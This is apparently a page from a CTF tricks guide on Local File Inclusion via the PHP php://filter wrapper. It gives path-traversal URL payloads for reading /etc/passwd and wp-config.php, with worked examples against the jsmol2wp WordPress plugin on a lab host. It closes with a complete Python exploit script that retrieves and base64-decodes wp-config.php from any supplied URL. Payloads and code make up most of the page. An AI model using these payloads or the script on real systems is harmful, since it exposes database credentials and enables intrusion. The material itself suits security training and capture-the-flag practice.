> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/lfi/php-filter-wrapper/trick-0334.md).

# LFI via php\://filter Wrapper

***

Exploit a Local File Inclusion (LFI) vulnerability using the `php://filter` wrapper to read arbitrary files. This wrapper treats the target file content as a stream, allowing it to be read even if direct inclusion doesn't output the content. Use the `resource=` parameter to specify the file path, often combined with path traversal (`../../`) to navigate to desired files like configuration files or source code.

```
http://[vulnerable-url]/[vulnerable-script].php?parameter=php://filter/resource=../../../../path/to/target/file
```

For example, targeting `wp-config.php` from a deep plugin directory:

```
http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
```

Or another file like `hello.php` within the same plugin directory structure, requiring similar traversal:

```
http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-content/plugins/hello.php
```

Adjust the path traversal (`../../../../`) based on the vulnerable script's location relative to the target file.

A common technique is to use the `convert.base64-encode` filter with `php://filter`. This filter base64-encodes the content of the target file before it is processed, ensuring that the raw content is returned in a format that can be easily decoded, even if the file contains characters that might break the output or execution flow.

The syntax for using the base64 filter is:

```
php://filter/read=convert.base64-encode/resource=[path_to_file]
```

For instance, to read `/etc/passwd` using this method:

```
http://[vulnerable-url]/[vulnerable-script].php?parameter=php://filter/read=convert.base64-encode/resource=/etc/passwd
```

Applying this to read `wp-config.php` via path traversal:

```
http://[vulnerable-url]/[vulnerable-script].php?parameter=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php
```

The response will contain the base64-encoded content of the target file, which then needs to be decoded to reveal the original content.

Automating this process can be done with a simple script. The following Python code demonstrates how to use the `convert.base64-encode` filter to retrieve and decode the contents of `wp-config.php` via the vulnerable `jsmol2wp` plugin:

```python
import requests
import base64
import sys

def exploit(url, path_to_wp_config):
    """
    Exploits LFI using php://filter to read wp-config.php base64 encoded.
    """
    payload = f"php://filter/convert.base64-encode/resource={path_to_wp_config}"
    full_url = f"{url}?isform=true&call=getRawDataFromDatabase&query={payload}"

    print(f"[*] Attempting to read {path_to_wp_config} from {url}")
    print(f"[*] Using URL: {full_url}")

    try:
        response = requests.get(full_url)
        response.raise_for_status() # Raise an exception for bad status codes

        # The response body contains the base64 encoded content
        encoded_content = response.text

        # Decode the base64 string
        try:
            decoded_content = base64.b64decode(encoded_content).decode('utf-8')
            print("\n[+] Successfully read and decoded file content:")
            print("-" * 40)
            print(decoded_content)
            print("-" * 40)
        except Exception as e:
            print(f"[-] Failed to decode base64 content: {e}")
            print(f"[-] Raw response body: {encoded_content[:500]}...") # Print first 500 chars

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <vulnerable_url> <path_to_wp_config_relative_to_vulnerable_script>")
        print("Example: python exploit.py http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php ../../../../wp-config.php")
        sys.exit(1)

    vulnerable_url = sys.argv[1]
    path_to_wp_config = sys.argv[2]

    exploit(vulnerable_url, path_to_wp_config)
```

This script constructs the URL with the base64 filter and the specified path, sends the request, and then decodes the received base64 content, effectively extracting the target file's source code or configuration details.
